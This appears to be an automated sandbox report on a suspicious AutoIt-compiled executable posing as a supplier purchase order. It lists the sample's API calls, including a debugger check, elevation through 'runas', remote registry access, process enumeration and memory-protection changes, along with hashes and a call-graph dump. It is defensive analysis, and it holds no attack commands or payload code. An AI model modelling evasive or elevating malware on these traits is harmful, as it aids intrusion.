110966 eb1063 111034 eed520 86 API calls 4 library calls 110966->111034 110967 eb0dee 110969 ead89e 50 API calls 110967->110969 110970 eb0dfa 110969->110970 110976 ead89e 50 API calls 110970->110976 110971 f1b772 111036 eed520 86 API calls 4 library calls 110971->111036 110972 eb0119 111035 eed520 86 API calls 4 library calls 110972->111035 110973->110978 110974 eaf6d0 417 API calls 110982 eafad8 Mailbox _memmove 110974->110982 110975 eac935 48 API calls 110975->110982 110977 eb0e83 110976->110977 110985 eacaee 48 API calls 110977->110985 110979 ead3d2 48 API calls 110979->110982 110981 eda599 InterlockedDecrement 110981->110982 110982->110961 110982->110965 110982->110966 110982->110967 110982->110970 110982->110971 110982->110972 110982->110974 110982->110975 110982->110977 110982->110978 110982->110979 110982->110981 110984 ec1b2a 52 API calls __cinit 110982->110984 110986 eb10f1 Mailbox 110982->110986 110990 ec010a 48 API calls 110982->110990 110991 eafa40 417 API calls 110982->110991 110994 f1b583 110982->110994 110996 ef936f 55 API calls 110982->110996 110997 efb74b 417 API calls 110982->110997 110998 ebef0d 94 API calls 110982->110998 110999 ea50a3 49 API calls 110982->110999 111000 f01f19 132 API calls 110982->111000 111001 ebf461 98 API calls 110982->111001 111002 ef8065 55 API calls 110982->111002 111003 f00bfa 129 API calls 110982->111003 111004 ef9122 91 API calls 110982->111004 111005 ef92c0 88 API calls 110982->111005 111006 ebdd84 3 API calls 110982->111006 111007 ef013f 87 API calls 110982->111007 111008 ebf03e 2 API calls 110982->111008 111009 f010e5 82 API calls 110982->111009 111010 f017aa 87 API calls 110982->111010 111011 f030ad 93 API calls 110982->111011 111012 f0798d 109 API calls 110982->111012 111013 f0804e 113 API calls 110982->111013 111026 eb1620 59 API calls Mailbox 110982->111026 111027 efee52 82 API calls 2 library calls 110982->111027 111028 efef9d 90 API calls Mailbox 110982->111028 111029 eeb020 48 API calls 110982->111029 111030 efe713 417 API calls Mailbox 110982->111030 110983 f1b7d2 110984->110982 110985->110986 111032 eed520 86 API calls 4 library calls 110986->111032 110990->110982 110991->110982 111031 eed520 86 API calls 4 library calls 110994->111031 110996->110982 110997->110982 110998->110982 110999->110982 111000->110982 111001->110982 111002->110982 111003->110982 111004->110982 111005->110982 111006->110982 111007->110982 111008->110982 111009->110982 111010->110982 111011->110982 111012->110982 111013->110982 111037 ea7b6e 48 API calls 111014->111037 111016 ebe0b4 _wcscmp 111017 eacaee 48 API calls 111016->111017 111019 ebe0e2 Mailbox 111016->111019 111018 f1b9c7 111017->111018 111038 ea7b4b 48 API calls Mailbox 111018->111038 111019->110982 111021 f1b9d5 111022 ead2d2 53 API calls 111021->111022 111023 f1b9e7 111022->111023 111024 ead89e 50 API calls 111023->111024 111025 f1b9ec Mailbox 111023->111025 111024->111025 111025->110982 111026->110982 111027->110982 111028->110982 111029->110982 111030->110982 111031->110986 111032->110978 111033->110966 111034->110972 111035->110971 111036->110983 111037->111016 111038->111021 111039 eae834 111040 eb2b40 417 API calls 111039->111040 111041 eae840 111040->111041

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00EA374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00EA376D
                                                                                                                                    • Part of subcall function 00EA4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00000104,?,00000000,00000001,00000000), ref: 00EA428C
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?), ref: 00EA377F
                                                                                                                                  • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00000104,?,00F61120,C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00F61124,?,?), ref: 00EA37EE
                                                                                                                                    • Part of subcall function 00EA34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00EA352A
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA3860
                                                                                                                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00F52934,00000010), ref: 00F121C5
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00F121FD
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00F12232
                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F3DAA4), ref: 00F12290
                                                                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 00F12297
                                                                                                                                    • Part of subcall function 00EA30A5: GetSysColorBrush.USER32(0000000F), ref: 00EA30B0
                                                                                                                                    • Part of subcall function 00EA30A5: LoadCursorW.USER32(00000000,00007F00), ref: 00EA30BF
                                                                                                                                    • Part of subcall function 00EA30A5: LoadIconW.USER32(00000063), ref: 00EA30D5
                                                                                                                                    • Part of subcall function 00EA30A5: LoadIconW.USER32(000000A4), ref: 00EA30E7
                                                                                                                                    • Part of subcall function 00EA30A5: LoadIconW.USER32(000000A2), ref: 00EA30F9
                                                                                                                                    • Part of subcall function 00EA30A5: RegisterClassExW.USER32(?), ref: 00EA3167
                                                                                                                                    • Part of subcall function 00EA2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EA2ECB
                                                                                                                                    • Part of subcall function 00EA2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EA2EEC
                                                                                                                                    • Part of subcall function 00EA2E9D: ShowWindow.USER32(00000000), ref: 00EA2F00
                                                                                                                                    • Part of subcall function 00EA2E9D: ShowWindow.USER32(00000000), ref: 00EA2F09
                                                                                                                                    • Part of subcall function 00EA3598: _memset.LIBCMT ref: 00EA35BE
                                                                                                                                    • Part of subcall function 00EA3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EA3667
                                                                                                                                  Strings
                                                                                                                                  • runas, xrefs: 00F1228B
                                                                                                                                  • C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, xrefs: 00EA37B4, 00EA37E9, 00EA37FD, 00F12257
                                                                                                                                  • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 00F121BE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                  • String ID: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                  • API String ID: 4253510256-2170441157
                                                                                                                                  • Opcode ID: e5a1cb756e74a16134b1cbed4e514826ccb266b38b0aff5000f862eef779ee8f
                                                                                                                                  • Instruction ID: c7d87a7a1ddf24437fcda6e1bf093e8285fbd4b09eab8cf7845fcc625b68a4d6
                                                                                                                                  • Opcode Fuzzy Hash: e5a1cb756e74a16134b1cbed4e514826ccb266b38b0aff5000f862eef779ee8f
                                                                                                                                  • Instruction Fuzzy Hash: 5A513B70604248BBDB10EBB0DC46BED77BCAB1B710F14115AF751BA1D1C6B09A85FB22
                                                                                                                                  Function 00F030AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1168 f030ad-f0315b call eaca8e call ead3d2 * 3 call ea84a6 call f03d7b call f03af7 1183 f03166-f03170 1168->1183 1184 f0315d-f03161 1168->1184 1186 f031a2 1183->1186 1187 f03172-f03187 RegConnectRegistryW 1183->1187 1185 f031e6-f031f2 call eed7e4 1184->1185 1198 f03504-f03527 call ea5cd3 * 3 1185->1198 1188 f031a6-f031c3 RegOpenKeyExW 1186->1188 1190 f03189-f0319a call ea7ba9 1187->1190 1191 f0319c-f031a0 1187->1191 1193 f031c5-f031d7 call ea7ba9 1188->1193 1194 f031f7-f03227 call ea84a6 RegQueryValueExW 1188->1194 1190->1185 1191->1188 1206 f031e3-f031e4 1193->1206 1207 f031d9-f031dd RegCloseKey 1193->1207 1203 f03229-f03239 call ea7ba9 1194->1203 1204 f0323e-f03254 call ea7ba9 1194->1204 1214 f034df-f034e6 call eed7e4 1203->1214 1215 f0325a-f0325f 1204->1215 1216 f034dc-f034dd 1204->1216 1206->1185 1207->1206 1223 f034eb-f034fc RegCloseKey 1214->1223 1219 f03265-f03268 1215->1219 1220 f0344c-f03498 call ec010a call ea84a6 RegQueryValueExW 1215->1220 1216->1214 1224 f033d9-f03411 call eead14 call ea84a6 RegQueryValueExW 1219->1224 1225 f0326e-f03273 1219->1225 1243 f034b4-f034ce call ea7ba9 call eed7e4 1220->1243 1244 f0349a-f034a6 1220->1244 1223->1198 1227 f034fe-f03502 RegCloseKey 1223->1227 1224->1223 1250 f03417-f03447 call ea7ba9 call eed7e4 call eb2570 1224->1250 1229 f03279-f0327c 1225->1229 1230 f0338d-f033d4 call ea84a6 RegQueryValueExW call eb2570 1225->1230 1227->1198 1233 f032de-f0332b call ec010a call ea84a6 RegQueryValueExW 1229->1233 1234 f0327e-f03281 1229->1234 1230->1223 1233->1243 1258 f03331-f03348 1233->1258 1234->1216 1240 f03287-f032d9 call ea84a6 RegQueryValueExW call eb2570 1234->1240 1240->1223 1264 f034d3-f034da call ec017e 1243->1264 1249 f034aa-f034b2 call eaca8e 1244->1249 1249->1264 1250->1223 1258->1249 1263 f0334e-f03355 1258->1263 1266 f03357-f03358 1263->1266 1267 f0335c-f03361 1263->1267 1264->1223 1266->1267 1270 f03363-f03367 1267->1270 1271 f03376-f0337b 1267->1271 1274 f03371-f03374 1270->1274 1275 f03369-f0336d 1270->1275 1271->1249 1276 f03381-f03388 1271->1276 1274->1270 1274->1271 1275->1274 1276->1249
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00F03AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F02AA6,?,?), ref: 00F03B0E
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F0317F
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00F0321E
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F032B6
                                                                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F034F5
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F03502
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1240663315-0
                                                                                                                                  • Opcode ID: 1ce82abe8cbd909a4b8629581cf3c1f6659264feea94cc0fd51f00c579ec95c4
                                                                                                                                  • Instruction ID: a4b5e3f1c70a0b68ead66871c7046f17f7a5bbd5c6c48fe82d1a6a3e7f9ef43d
                                                                                                                                  • Opcode Fuzzy Hash: 1ce82abe8cbd909a4b8629581cf3c1f6659264feea94cc0fd51f00c579ec95c4
                                                                                                                                  • Instruction Fuzzy Hash: 2CE17E75604210AFCB14DF25CD95E2ABBE9EF89324F04846DF44ADB2A1DB31ED01EB52
                                                                                                                                  Function 00EA29C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1278 ea29c2-ea29e2 1280 ea2a42-ea2a44 1278->1280 1281 ea29e4-ea29e7 1278->1281 1280->1281 1284 ea2a46 1280->1284 1282 ea2a48 1281->1282 1283 ea29e9-ea29f0 1281->1283 1288 ea2a4e-ea2a51 1282->1288 1289 f12307-f12335 call ea322e call ebec33 1282->1289 1285 ea2aac-ea2ab4 PostQuitMessage 1283->1285 1286 ea29f6-ea29fb 1283->1286 1287 ea2a2b-ea2a33 NtdllDefWindowProc_W 1284->1287 1295 ea2a72-ea2a74 1285->1295 1293 ea2a01-ea2a03 1286->1293 1294 f1238f-f123a3 call ee57fb 1286->1294 1296 ea2a39-ea2a3f 1287->1296 1290 ea2a53-ea2a54 1288->1290 1291 ea2a76-ea2a9d SetTimer RegisterClipboardFormatW 1288->1291 1324 f1233a-f12341 1289->1324 1297 ea2a5a-ea2a6d KillTimer call ea2b94 call ea2ac7 1290->1297 1298 f122aa-f122ad 1290->1298 1291->1295 1300 ea2a9f-ea2aaa CreatePopupMenu 1291->1300 1301 ea2a09-ea2a0e 1293->1301 1302 ea2ab6-ea2ac0 call ea1e58 1293->1302 1294->1295 1317 f123a9 1294->1317 1295->1296 1297->1295 1310 f122e3-f12302 MoveWindow 1298->1310 1311 f122af-f122b1 1298->1311 1300->1295 1306 f12374-f1237b 1301->1306 1307 ea2a14-ea2a19 1301->1307 1318 ea2ac5 1302->1318 1306->1287 1313 f12381-f1238a call edb31f 1306->1313 1315 ea2a1f-ea2a25 1307->1315 1316 f1235f-f1236f call ee5fdb 1307->1316 1310->1295 1319 f122b3-f122b6 1311->1319 1320 f122d2-f122de SetFocus 1311->1320 1313->1287 1315->1287 1315->1324 1316->1295 1317->1287 1318->1295 1319->1315 1325 f122bc-f122cd call ea322e 1319->1325 1320->1295 1324->1287 1329 f12347-f1235a call ea2b94 call ea3598 1324->1329 1325->1295 1329->1287
                                                                                                                                  APIs
                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00EA2A33
                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 00EA2A5D
                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EA2A80
                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00EA2A8B
                                                                                                                                  • CreatePopupMenu.USER32 ref: 00EA2A9F
                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00EA2AAE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                  • String ID: TaskbarCreated
                                                                                                                                  • API String ID: 157504867-2362178303
                                                                                                                                  • Opcode ID: 062c1989ee3e4b663f2a456982f23a68dfb2ea2655f3aae5a7a95d25a1caf222
                                                                                                                                  • Instruction ID: 72d73e0f98f0a31f8a649c695d5910d5703e82af88ea39b97a56bac110427eee
                                                                                                                                  • Opcode Fuzzy Hash: 062c1989ee3e4b663f2a456982f23a68dfb2ea2655f3aae5a7a95d25a1caf222
                                                                                                                                  • Instruction Fuzzy Hash: 6141E631504249ABDF346F6C9C09BF93A96FB1A340F081119F612FB5A1EA74AC90B761
                                                                                                                                  Function 00EBE47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00EBE4A7
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00F3DC28,?,?), ref: 00EBE567
                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,00F3DC28,?,?), ref: 00EBE5BC
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00EBE5C7
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00EBE5DA
                                                                                                                                  • GetSystemInfo.KERNEL32(?,00F3DC28,?,?), ref: 00EBE5E4
                                                                                                                                  • GetSystemInfo.KERNEL32(?,00F3DC28,?,?), ref: 00EBE5F0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2717633055-0
                                                                                                                                  • Opcode ID: bbc309d3ac2fff03d94c3f482ee9c672a8fd2dbf74fb37a8cc308693e4133c7e
                                                                                                                                  • Instruction ID: 42b555350b806aea42bad37be30d32acef74bd247b3a1ab451e936c931edfbcd
                                                                                                                                  • Opcode Fuzzy Hash: bbc309d3ac2fff03d94c3f482ee9c672a8fd2dbf74fb37a8cc308693e4133c7e
                                                                                                                                  • Instruction Fuzzy Hash: 3C61E0B180A384CFCF25CFA898C11EA7FB46F2A304F1845D9D844AB30BD624C949DB66
                                                                                                                                  Function 00EA31F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EA3202
                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00EA3219
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00F157D7
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00F157EC
                                                                                                                                  • LockResource.KERNEL32(?), ref: 00F157FF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                  • String ID: SCRIPT
                                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                                  • Opcode ID: 9c3e200d3cec52e4e14ae50c2dce4a3e28ccf192b3328e7af1e5f35c4274ba4d
                                                                                                                                  • Instruction ID: 4e97a39bef3aa45375829fb755e9ecabdf3b6d6aed690188fff512db150dd0d6
                                                                                                                                  • Opcode Fuzzy Hash: 9c3e200d3cec52e4e14ae50c2dce4a3e28ccf192b3328e7af1e5f35c4274ba4d
                                                                                                                                  • Instruction Fuzzy Hash: 7B117C70240705BFE7318BA5EC48F677BB9EBCAB55F208168F4029A1A0DB71ED019A70
                                                                                                                                  Function 00EE6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00EE6F7D
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00EE6F8D
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00EE6FAC
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EE6FD0
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6FE3
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00EE7022
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1605983538-0
                                                                                                                                  • Opcode ID: c7dc1e7340a1775e1afbfd5f68b21598dc9d56b496ab7ea27dcac9d20d999f33
                                                                                                                                  • Instruction ID: b1e8583e2a3d57ed003279760e77388ee2c394df57ffee4e98148d54e60f7df9
                                                                                                                                  • Opcode Fuzzy Hash: c7dc1e7340a1775e1afbfd5f68b21598dc9d56b496ab7ea27dcac9d20d999f33
                                                                                                                                  • Instruction Fuzzy Hash: 4F214C7190425CABDB20ABA1CC89BEAB7BCAB49304F1014A9E645E3141E7759F85DB60
                                                                                                                                  Function 010020B0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 010021EA
                                                                                                                                  • GetProcAddress.KERNEL32(?,00FFBFF9), ref: 01002208
                                                                                                                                  • ExitProcess.KERNEL32(?,00FFBFF9), ref: 01002219
                                                                                                                                  • VirtualProtect.KERNEL32(00EA0000,00001000,00000004,?,00000000), ref: 01002267
                                                                                                                                  • VirtualProtect.KERNEL32(00EA0000,00001000), ref: 0100227C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1996367037-0
                                                                                                                                  • Opcode ID: 33e6f3c64799f002afa4b5d8cddaa00d057348bdf89c83ac4c8843e44a2f448c
                                                                                                                                  • Instruction ID: 15055f7a82773e66ee855c5c009bad38ad7df8aff9d633ea1f27cddb74e551ff
                                                                                                                                  • Opcode Fuzzy Hash: 33e6f3c64799f002afa4b5d8cddaa00d057348bdf89c83ac4c8843e44a2f448c
                                                                                                                                  • Instruction Fuzzy Hash: E2510576A443525BF7239ABCCCC86E4BBE5EB51220F180778DBE1C73C6E7A058068761
                                                                                                                                  Function 00EEEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EE78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00EE78CB
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00EEF04D
                                                                                                                                  • CoCreateInstance.COMBASE(00F2DA7C,00000000,00000001,00F2D8EC,?), ref: 00EEF066
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EEF083
